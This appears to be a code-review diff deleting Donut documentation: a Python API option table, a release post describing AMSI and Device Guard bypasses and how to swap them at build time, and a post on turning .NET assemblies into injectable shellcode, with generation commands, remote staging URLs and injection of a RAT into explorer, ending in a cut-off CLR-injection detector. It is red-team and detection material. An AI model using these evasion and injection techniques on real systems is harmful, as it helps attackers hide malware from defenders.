<td>Indicates if the input file should be compressed. Available engines are 1=<code>DONUT_COMPRESS_NONE</code>, 2=<code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports 3=<code>DONUT_COMPRESS_LZNT1</code>, 4=<code>DONUT_COMPRESS_XPRESS</code> and 5=<code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
</tr>
<tr>
<td>entropy</td>
<td>Integer</td>
<td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are 1=<code>DONUT_ENTROPY_NONE</code>, 2=<code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and 3=<code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
</tr>
<tr>
<td>format</td>
<td>Integer</td>
<td>Specifies the output format for the shellcode loader. Supported formats are 1=<code>DONUT_FORMAT_BINARY</code>, 2=<code>DONUT_FORMAT_BASE64</code>, 3=<code>DONUT_FORMAT_RUBY</code>, 4=<code>DONUT_FORMAT_C</code>, 5=<code>DONUT_FORMAT_PYTHON</code>, 6=<code>DONUT_FORMAT_POWERSHELL</code>, 7=<code>DONUT_FORMAT_CSHARP</code> and 8=<code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
</tr>
<tr>
<td>exit_opt</td>
<td>Integer</td>
<td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Use 2=<code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API. Use 3=<code>DONUT_OPT_EXIT_BLOCK</code> to not exit or cleanup and instead block indefinitely.</td>
</tr>
<tr>
<td>thread</td>
<td>Integer</td>
<td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
</tr>
<tr>
<td>oep</td>
<td>String</td>
<td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
</tr>
<tr>
<td>output</td>
<td>String</td>
<td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
</tr>
<tr>
<td>runtime</td>
<td>String</td>
<td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
</tr>
<tr>
<td>appdomain</td>
<td>String</td>
<td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
</tr>
<tr>
<td>cls</td>
<td>String</td>
<td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</td>
</tr>
<tr>
<td>method</td>
<td>String</td>
<td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
</tr>
<tr>
<td>params</td>
<td>String</td>
<td>List of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
</tr>
<tr>
<td>unicode</td>
<td>Integer</td>
<td>By default, the <code>params</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
</tr>
<tr>
<td>url or server</td>
<td>String</td>
<td>If the instance type is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
</tr>
<tr>
<td>modname</td>
<td>String</td>
<td>If the type is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
</tr>
</table>
## Author
The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
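Review bot: if setup.py and the `donut` Python module stay in the tree, this is the only documentation of the `create()` keywords and should stay with them (or the new README should state that the Python module is unsupported in this fork); deleting the doc while leaving the module builds a surprise for anyone who runs `pip3 install .`. One inconsistency in the table being removed is worth reporting upstream rather than losing: the `format` row numbers 3=`DONUT_FORMAT_RUBY` and 4=`DONUT_FORMAT_C`, while the `-f` row of the README switch table removed in this same commit lists "3=C, 4=Ruby".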


@ -1,154 +0,0 @@
---
layout: post
title: Donut v0.9.1 "Apple Fritter" - Dual-Mode Shellcode, AMSI, and More
---
*TLDR: Version v0.9.1 "Apple Fritter" of Donut has been released, including dual-mode (AMD64+x86) shellcode, AMSI bypassing for .NET v4.8, automatic version detection of payloads, better support for Program.Main().*
# Introduction
In case you are unaware, [Donut](https://github.com/TheWover/donut "Donut") is a shellcode generation tool that creates native shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
Today, we released version v0.9.1. The major features include:
* Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
* Automatic detection of the CLR version required for .NET Assembly payloads.
* AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
* Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
* Bypass for Device Guard policy preventing execution of dynamically generated .NET code
* Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
# Feature Breakdown
## Dual-Mode Shellcode
Odzhan knew an old trick for crafting shellcode that can run in either x86 or x64 Windows processes using REX prefixes. We combine the x86 and x64 shellcode with a stub that "detects" the architecture of the process. The layout in memory looks like:
```
--------------------------------------------------
| detection stub | x64 shellcode | x86 shellcode |
--------------------------------------------------
```
And the logic:
```assembly
0x31C0 xor eax, eax // null eax
0x48 dec eax // decrement eax to produce an underflow
0x0F88 js dword x86_code // jump to x86 payload if we are in a WOW64 process
<x64_code> // the x64 PIC machine code for the payload
<x86_code> // the x86 PIC machine code for the payload
```
There are two ways this code can execute.
If the process is WOW64 (x86):
1) ```eax``` will be nulled.
2) ```eax``` will be decremented, resulting in an underflow.
3) Since the sign flag is set from the underflow, the condition for the jump is satisfied. Jump to the x86 shellcode.
If the process is x64:
1) ```eax``` will be nulled.
2) ```0x48``` is an REX prefix for the next instruction
3) The previous REX prefix is not valid for the ```js``` instruction. As such, nothing happens.
4) Since the x64 PIC is immediately following the previous instruction in memory, ```eip``` is now pointing at the first instruction in the x64 PIC. It now executes.
Starting in the v0.9.1 "Apple Fritter" release, dual-mode shellcode is the default. You may still tell Donut to produce x86 or x64 shellcode, rather than AMD64+x86.
Naturally, the dual-mode PIC will be larger than the other options. If the size of the PIC matters, use the version for the particular process you are targeting. Or, have your injector check the architecture of the target process before injecting into it. If not, use the dual-mode version to ensure maximum compatbility with host processes.
## Auto-Detect CLR Version
Rather than require the user to specify the CLR version, we now read the headers of the .NET Assembly to determine the appropriate CLR version.
The .NET Assembly file format is an extension of the regular [PE Format](https://en.wikipedia.org/wiki/Portable_Executable) used by Windows executables. One of the optional fields used by .NET is the ```IMAGE_COR20_HEADER```, which references a ```STORAGESIGNATURE``` structure containing the version details necessary to load the correct runtime. We check the ```iVersionString``` variable to get the exact version requirement for your Assembly. Please note, the names of these data structures and variables are somewhat arbitrary. I am borrowing [dnSpy's](https://github.com/0xd4d/dnSpy) terminology so that I can show you these two pretty pictures.
The relevant layout of the .NET headers in my SafetyKatz DLL as stored on disk:
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/headers_in_PE.PNG)
And what the ```STORAGESIGNATURE``` structure actually looks like:
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/structured_headers.PNG)
If you do not want us to automatically determine the version number, you may still manually specify what version to use with the `-r` flag.
## Main Entry Point
The original version of Donut did not handle Main entry points for EXEs well due to the fact that it uses an object array as its function signature rather than a string array. We now correctly handle this so that you don't have to know about the difference. :-)
## AMSI Patching
To provide some context, AMSI integration has been added to the new version of the .NET Framework. It has also been ported to [.NET Core](https://github.com/dotnet/coreclr/issues/21370).
Specifically, AMSI integration was added to the CLR itself so that any .NET Assemblies loaded from memory will be scanned with ```AmsiScanBuffer``` from ```amsi.dll``` before they are loaded. If the result of ```AmsiScanBuffer``` is anything but ```S_OK``` it will return an ```HRESULT``` error code. This affects everything that loads Assemblies from memory using the CLR, including ```System.Reflection.Assembly.Load```, Donut shellcode, and (presumably if I could test it) Cobalt Strike's ```execute-assembly``` command.
When you try to load a .NET Assembly from memory that is known to be malicious, you get a Defender alert that looks like the picture below. Notice that data source was AMSI, and that the process it was running in is ```notepad.exe```. The assembly was injected into notepad through Donut shellcode.
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/donut_AMSI.PNG)
However, their implementation of AMSII integration is subject to memory patching bypasses in the same way that PowerShell is. We developed on existing research, produced some custom bypasses, and added a modular bypass system to Donut that lets you choose which technique you would like to use.
Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) detailing each of the AMSI bypasses we added to Donut. It is important to note that there could be many more. I believe that anyone who sits down to do the research and develop an AMSI bypass will probably come up with their own slightly different variant. As long as Microsoft continues to rely on calling DLL functions from user-level memory space, AMSI will be subject to memory patching bypasses.
The result looks like the picture below. I safely injected SafetyKatz into ```notepad.exe``` using Donut shellcode, even thought AMSI was used. Defender shows no detections.
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/amsi_is_dead.PNG)
I must strongly emphasize, the fact that 4.8 AMSI can be bypassed like in PowerShell does NOT make it useless. This new AMSI is a *good thing* that will benefit .NET Security. It incurs cost upon adversaries. Use it. But also recognise that, like everything, it has its limitations.
### Modular Bypass System
As we researched bypasses for AMSI, it became clear that there is many ways to do it. It would be silly to force users of Donut to have to use whatever we came up with. As such, we ensured that you may easily add your own bypass or customize one of ours. The bypasses are defined in ```payload/bypass.c```. You may either modify our C code, or add your own. Each bypass implements the same ```BOOL DisableAMSI(PDONUT_INSTANCE inst)``` function and is wrapped in an ```#ifdef BYPASS_NAME``` preprocessor directive. To change which bypass is used, change the Makefile to define the bypass name specified by the directive.
For example, you could change the relevant line in ```payload/Makefile.msvc``` from
```
cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c
```
To:
```
cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c
```
In order to switch from using BypassA to BypassB.
This system not only makes it easy to change the bypass technique, but also reduces the size, complexity, and signaturability of the shellcode by ensuring that code you are not using is present in the PIC to be found by AV/EDR.
## Device Guard Dynamic Code Prevention Bypass
Windows Defender Device Guard includes an optional policy for disabling dynamically-generated .NET code from executing. Because it was mixed-in with the AMSI scanning code, we went ahead and disabled it too. Not sure if that will help anyone, but hey it was easy. ¯\_(ツ)_/¯
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/code_integrity.png)
# Conclusion
Donut v0.9.1 "Apple Fritter" represents the first improvements to Donut. More improvements are coming as we have time to make them. In the meantime, Donut is still in Beta so we welcome feedback and testing.
I know that several people have already had difficulties integrating Donut into their toolsets because of the complexity of the data structures it uses. To help with this, our plan for the full release (version 1.0) is to produce C# and Python generators. That will be the primary focus of our efforts moving forward.
## Plans
Below is the current version release plan for Donut.
* v0.9.1:
* Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
* Automatic detection of the CLR version required for .NET Assembly payloads.
* AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
* Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
* Bypass for Device Guard policy preventing execution of dynamically generated .NET code
* Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
* v1.0:
* C# generator
* C# wrapper for our dynamic library
* Python generator
* Python wrapper for our dynamic library
* Better documentation for debugging, designing with, and integrating Donut.
* v1.1:
* Automatic unloading of Application Domains after the Assembly finishes executing.
* Support for HTTP proxies
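Review bot: this deletion-only hunk removes the v0.9.1 release notes together with the only written description of the modular bypass build procedure (the `cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A ...` line in `payload/Makefile.msvc` and how to swap the `-DBYPASS_*` define) and the `Plans` roadmap, with nothing in this hunk replacing them. If the intent is only to retire the blog post, consider moving the "Modular Bypass System" build instructions and the version plan into the project docs before deleting, and, if the text is kept anywhere, fix the inverted sentence "ensuring that code you are not using is present in the PIC" to "is not present in the PIC", since the surrounding text argues the system reduces size and signaturability.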

View File

@ -1,336 +0,0 @@
---
layout: post
title: Donut - Injecting .NET Assemblies as Shellcode
---
*TLDR: You can now inject .NET Assemblies into Windows processes using this repo: https://github.com/TheWover/donut/*
# Advancing Tradecraft - Context
Offensive and red team tradecraft have changed significantly in the past year. As anti-malware systems improve their capability to detect and deter offensive tools, attackers are shifting their focus to technologies that are not observed by AV. Currently, that means operating entirely in memory and avoiding dropping files onto disk. In the Windows world, the .NET Framework provides a convenient mechanism for this. It is, however, severely restricted in that .NET programs cannot be injected directly into remote processes. In this article, we will address this issue by describing how to inject .NET code into processes via shellcode.
## .NET Primer
Before we begin, you must understand a few important components of .NET.
<details>
<summary>Click to expand the primer!</summary>
* [Common Language Runtime](https://docs.microsoft.com/en-us/dotnet/standard/clr "Common Language Runtime"): Like Java, .NET uses a runtime environment (or "virtual machine") to interpret code at runtime. All .NET Code is compiled from an intermediate language to native code "Just-In-Time" before execution.
* [Common Intermediate Language](https://docs.microsoft.com/en-us/dotnet/standard/managed-code "Common Intermediate Language"): Speaking of an intermediate language, .NET uses CIL (also known as MSIL). All .NET languages (of which there are many) are "assembled" to this intermediate language. CIL is a generic object-oriented assembly language that can be interpreted into machine code for any hardware architecture. As such, the designers of .NET languages do not need to design their compilers around the architectures they will run on. Instead, they merely need to design it to compile to one language: CIL.
* [.NET Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/assemblies-in-the-common-language-runtime ".NET Assemblies"): .NET applications are packaged into .NET Assemblies. They are so called because the code from your language of choice has been "assembled" into CIL but not truly compiled. Assemblies use an extension of the PE format and are represented as either an EXE or a DLL that contains CIL rather than native machine code.
* [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains "Application Domains"): Assemblies are run inside of a safe "box" known as an Application Domain. Multiple Assemblies can exist within an AppDomain, and multiple AppDomains can exist within a process. AppDomains are intended to provide the same level of isolation between executing Assemblies as is normally provided for processes. Threads may move between AppDomains and can share objects through marshalling and delegates.
</details>
## Current state of .NET Tradecraft
Currently, .NET tradecraft is limited to post-exploitation execution by one of two main ways:
* Assembly.Load(): The .NET Framework's standard library includes an API for [code reflection](https://en.wikipedia.org/wiki/Reflection_(computer_programming)). This Reflection API includes System.Reflection.Assembly.Load, which can be used to load .NET programs from memory. In less than five lines of code, you may load a .NET DLL or EXE from memory and execute it.
* execute-assembly: In Cobalt Strike 3.11, Raphael Mudge introduced a command called 'execute-assembly' that ran .NET Assemblies from memory as if they were run from disk. This command introduced the world to .NET tradecraft and signalled the shift to [Bringing Your Own Land](https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html).
However, both execution vectors produce challenges for red teams seeking to develop flexible TTPs.
## Assembly.Load
While the Reflection API is very versatile and can be useful in many different ways, it can only run code in the current process. No support is provided for running payloads in remote processes.
## execute-assembly
The main problem with execute-assembly is that it executes the same way every time. That predictability ensures that it is reliable, but also lets defenders built analytics.
1. A subprocess is created using the *spawnto* executable. Mudge refers to this as a "sacrificial process" because it acts as a host for your payloads, isolating your Beacon's process from any failure in your code.
2. A reflective DLL is injected into the subprocess to load the .NET Runtime.
3. The reflective DLL loads an intermediate .NET Assembly to handle errors and improve the stability of your payload.
4. The intermediate .NET Assembly loads your .NET Assembly from memory inside the subprocess.
5. The main entry point of your Assembly is invoked along with your command-line arguments.
The result is that execute-assembly *does* allow you to inject your .NET Assembly into a remote process. However, it does not let you inject into a running process or specify how that injection occurs. It is only modular in *what* you can run, not *how* you can run it. The most that you can do is to specify what exceutable is run for your sacrificial subprocess by changing the *spawnto* variable in your Malleable C2 Profile. execute-assembly also has a hidden size limitation of 1 MB for your payloads, which limits your flexibility in designing post-exploitation tools.
## Moving Forward
To move past these limitations, we need a technique that meets the following requirements:
* Allows you to run .NET code from memory.
* Can work with any Windows process, regardless of its architecture and whether it has the CLR loaded.
* Allows you to inject that code in either a remote (different) process or the local (current) process.
* Allows you to determine in what way that injection occurs.
* Works with multiple types of process injection.
The most flexible type of payload that meets those requirements is shellcode. But you can't just convert a .NET Assembly to shellcode. They run through a runtime environment, not directly on the hardware. Wouldn't it be great if we could just inject .NET Assemblies as shellcode? Yes. Yes, it would.
# Introducing Donut
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/donut.png)
```Shortly before publishing donut, Odzhan and I became aware of another team working on a shellcode generator for .NET Assemblies. They were at the same stage of their project at us. We both agreed that whomever of us published first would ensure that the other received due credit for their work. As soon as they publish their tool, we will update this article with a link.```
Donut is a shellcode generation tool that creates x86 or x64 shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
Donut is currently at version 0.9 (Beta). Please share any issues or suggestions with us as Issues on GitHub. Once we have received feedback, we will release version 1.0. A link to the compiled v0.9 release can be found [here](https://github.com/TheWover/donut "Release 0.9").
# How it Works
## Unmanaged Hosting API
Microsoft provides an API known as the [Unmanaged CLR Hosting API](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/). This API allows for unmanaged code (such as C or C++) to host, inspect, configure, and use Common Language Runtimes. It is a legitimate API that can be used for many purposes. Microsoft uses it for several of their products, and other companies use it to design custom loaders for their programs. It can be used to improve performance of .NET applications, create sandboxes, or just do wierd stuff. We do the latter.
One of the things it can do is manually load .NET Assemblies into arbitrary [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains). It can do this either from disk or from memory. We utilize its capability for loading from memory to load your payload without touching disk.
To see a standalone example of an Unmanaged CLR Hosting Assembly loader, check out Casey Smith's repo: [AssemblyLoader](https://github.com/caseysmithrc/AssemblyLoader)
## CLR Injection
The first action that donut's shellcode takes is to load the CLR. Unless the user specifies the exact runtime version to use, v4.0.30319 of the CLR will be used by default, which supports the versions 4.0+ of .NET. If the attempt to load a specific version fails, then donut will attempt to use whichever one is avialable on the system. Once the CLR is loaded, the shellcode creates a new Application Domain. At this point, the .NET Assembly payload must be obtained. If the user provided a staging URL, then the Assembly is downloaded from it. Otherwise, it is obtained from memory. Either way, it will loaded into the new AppDomain. After the Assembly is loaded but before it is run, the decrypted copy will be released and later freed from memory with VirtualFree to deter memory scanners. Finally, the Entry Point specified by the user will be invoked along with any provided parameters.
If the CLR is already loaded into the host process, then donut's shellcode will still work. The .NET Assembly will just be loaded into a new Application Domain within the managed process. .NET is designed to allow for .NET Assemblies built for multiple versions of .NET to run simultaneously in the same process. As such, your payload should always run no matter the process's state before injection.
## Shellcode Generation
The logic above describes how the shellcode generated by donut works. That logic is defined in payload.exe. To get the shellcode, exe2h extracts the compiled machine code from the .text segment in payload.exe and saves it as a C array to a C header file. donut combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
# Using Donut
Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Both a Windows EXE and a Python (Python planned for v1.0) script are provided for payload generation. The command-line syntax is as described below.
```
usage: donut [options] -f <.NET assembly> -c <namespace.class> -m <Method>
-f <path> .NET assembly to embed in PIC and DLL.
-u <URL> HTTP server hosting the .NET assembly.
-c <namespace.class> The assembly class name.
-m <method> The assembly method name.
-p <arg1,arg2...> Optional parameters for method, separated by comma or semi-colon.
-a <arch> Target architecture : 1=x86, 2=amd64(default).
-r <version> CLR runtime version. v4.0.30319 is used by default.
-d <name> AppDomain name to create for assembly. Randomly generated by default.
examples:
donut -a 1 -c TestClass -m RunProcess -p notepad.exe -f loader.dll
donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe -u http://remote_server.com/modules/
```
## Generating Shellcode
To generate shellcode with donut, you must specify a .NET Assembly, an Entry Point, and any parameters that you wish to use. If your Assembly uses the *Test* namespace and includes the *Program* class with the *Main* method, then you would use the following options:
```
donut.exe -f Test.exe -c Test.Program -m Main
```
To generate the same shellcode for 32-bit processes, use the '-a' option:
```
donut.exe -a 1 -f Test.exe -c Test.Program -m Main
```
You may also provide parameters to whatever Entry Point you specify. The max length of each parameter is currently 32 characters. To demonstrate this functionality, you may use the following options and our example Assembly to create shellcode that will spawn a Notepad process and a Calc process:
```
.\donut.exe -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
```
When generating shellcode to run an an older Windows machine, you may need it to use v2 of the CLR, rather than v4. v2 works for versions of the .NET Framework <= 3.5, while v4 works for versions >= 4.0. By default, donut uses version 4 of the CLR. You may tell it to use v2 with the '-r' option and specifying "v2.0.50727" as the parameter.
```
.\donut.exe -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
```
The name of the AppDomain for your .NET payload may be specified manually using the '-d' option. By default, it will be randomly generated. You may specify a name.
```
.\donut.exe -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
```
In order to reduce the size of your shellcode (or for many other reasons), you may specify a URL where your payload will be hosted. Donut will produce an encrypted Donut Module with a random name that you should place at the URI you specified. The name and location where you should place it will be printed to your screen when you generate the shellcode.
```
.\donut.exe -u http://remote_server.com/modules/ -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
```
## Demonstrating with SILENTTRINITY
For a demonstration, we will use the [SILENTTRINITY RAT](https://github.com/byt3bl33d3r/SILENTTRINITY "SILENTTRINITY") as a test payload. Since it is the most... ahh... complicated .NET Assembly that I could find, I used it for all of my testing. You may use any standard shellcode injection technique to inject the .NET Assembly. The DonutTest subproject is provided in the repo as an example injector. You may combine it with the DemoCreateProcess subproject to test the shellcode generator. In our case, we will first use DonutTest to inject into explorer. We also show what it looks like to use an existing implant to perform further injection using the ``` boo/shellcode ``` and ``` ipy/execute-assembly ``` post-exploitation modules.
### Generation
First, we will generate a x64 PIC using the SILENTTRINITY DLL. Using PowerShell, we will base64-encode the result and pipe it to our clipboard.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy.png)
Because we don't know what processes will be available to inject into on-target, we will also generate a x86 PIC just in case we need it.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy_86.png)
If you wanted to, you could use a staging server by providing the URL and copying the Donut Module to the specified location.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/generate_URL.png)
### Choosing a Host Process
Use ProcessManager, a sub-project provided in the donut repo, to enumerate processes. ProcessManager enumerates all running processes and makes a best effort to obtain information about them. It is specifically designed to aid in determining what process to inject / migrate into. The picture below demonstrates its general usage.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ProcessManager.jpg)
### Injecting
First, we will use DonutTest to inject into explorer using DonutTest.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_inject.jpg)
As you can see, the injection was successfull:
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_success.png)
Now assume we already have an agent running on the machine. We can use SILENTTRINITY's post-exploitation modules to inject implants into running processes.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_through_agent.png)
## Using as a Library
donut is provided as both dynamic and static libraries for both (*.a* / *.so*) and Windows (*.lib* / *.dll*). It has a simple API that is described in *docs\api.html*. Two exported functions are provided, ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
## Rebuilding the shellcode
You may easily customize our shellcode to fit your use case. *payload.c* contains the .NET assembly loader, which should successfully compile with both Microsoft Visual Studio and mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever *payload.c* has been changed, recompiling for all architectures is recommended before rebuilding donut.
### Microsoft Visual Studio
Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
```
nmake clean -f Makefile.msvc
nmake -f Makefile.msvc
```
This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
```
nmake clean -f Makefile.msvc
nmake x86 -f Makefile.msvc
```
This will save the shellcode as a C array to *payload_exe_x86.h*.
### Mingw-w64
Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
```
make clean -f Makefile.mingw
make -f Makefile.mingw
```
Once you've recompiled for all architectures, you may rebuild donut.
## Integrating into Tooling
We hope that donut (or something inspired by it) will be integrated into tooling to provide **inject** and **migrate** functionality. To do so, we suggest one of the following methods:
* As an operator, using the generator to manually generate shellcode.
* Generate the shellcode dynamically on your C2 server, pass that down to an existing implant, and inject it into another process.
* Use our dynamic or static libraries.
* As a template for building your own shellcode / generator.
* Use our Python (Python planned for v1.0) extension to script shellcode generation dynamically.
# Advancing Tradecraft
It is our hope that releasing donut to the public will advance offensive and red team tradecraft in several ways:
* Provide red teams and adversary emulators with a means to emulate this technique that threat actors may have developed in secret.
* Provide blue teams a frame of refernce for detecting and mitigating CLR Injection techniques.
* Inspire tool developers to develop new types of techniques and tradecraft.
## Alternative Payloads
The main benefit of using .NET Assemblies as shellcode is that they can now be executed by anything that can execute shellcode on Windows. There are many more ways to inject shellcode than there are to load Assemblies. As such, offensive tool designers no longer need to design their payloads around running .NET. Instead, they may leverage their existing payloads and techniques that use shellcode.
## Injecting .NET At Will / Migration
Donut will also allow the developers of C2 Frameworks / RATs to add migrate-like functionality to their tools. By using Donut as a library (or calling the generator) on the server and then providing the result to an existing agent, it may inject a new instance of itself into another running process. This may also be used to inject arbitrary post-exploitation modules so long as I/O is properly redirected.
## Disposable AppDomains
When donut loads an Assembly, it loads it into a new AppDomain. Unless the user specifies the name of the AppDomain with the '-d' parameter, the AppDomain is given a random name. We specifically designed donut to run payloads in new AppDomains rather than using DefaultDomain. If this does not suit you, you can easily modify payload.c to use the default domain. By running the payload in its own AppDomain, this allows for the development of tools that run post-exploitation modules in disposable AppDomains. Application Domains can be unloaded, but individual Assemblies cannot. Therefore, to unload an Assembly when you are done with it, you must put it into its own AppDomain and unload that instead. A C# agent can have the shellcode generated on its server, inject the result into itself in a new thread, wait for the Assembly to finish executing, then unload the host AppDomain. You could also modify the shellcode itself to perform that role.
## Detecting CLR Injection
One of the companion projects for donut is ModuleMonitor. It uses WMI Event Win32_ModuleLoadTrace to monitor for module loading. It provides filters, detailed data, and has an option to monitor for CLR Injection attacks.
The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
While useful, there are both false positives and false negatives:
* False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
* False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
Please Note: This is intended **only** as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment.
I am not a defender, but the following pseudocode is my attempt at an analytic that follows this logic. The DLLs that are associated with the CLR all start with "msco", such as "mscorlib.dll" and "mscoree.dll". As such, we watch for their loading, then check if the program that loaded them is a valid .NET Assembly.
```
void CLR_Injection:
WHEN Image_Load event:
if event.Module.Name contains "msco*.dll":
if !(IsValidAssembly(event.Process.FilePath)):
{
print "A CLR has been injected into " + event.Process.Id
}
```
The snippet below represents my implementation of this logic in C#. The full code can be found in ModuleMonitor.
```csharp
//CLR Sentry
//Author: TheWover
while (true)
{
//Get the module load.
Win32_ModuleLoadTrace trace = GetNextModuleLoad();
//Split the file path into parts delimited by a '\'
string[] parts = trace.FileName.Split('\\');
//Check whether it is a .NET Runtime DLL
if (parts[parts.Length - 1].Contains("msco"))
{
//Get a
Process proc = Process.GetProcessById((int) trace.ProcessID);
//Check if the file is a .NET Assembly
if (!IsValidAssembly(proc.StartInfo.FileName))
{
//If it is not, then the CLR has been injected.
Console.WriteLine();
Console.WriteLine("[!] CLR Injection has been detected!");
//Display information from the event
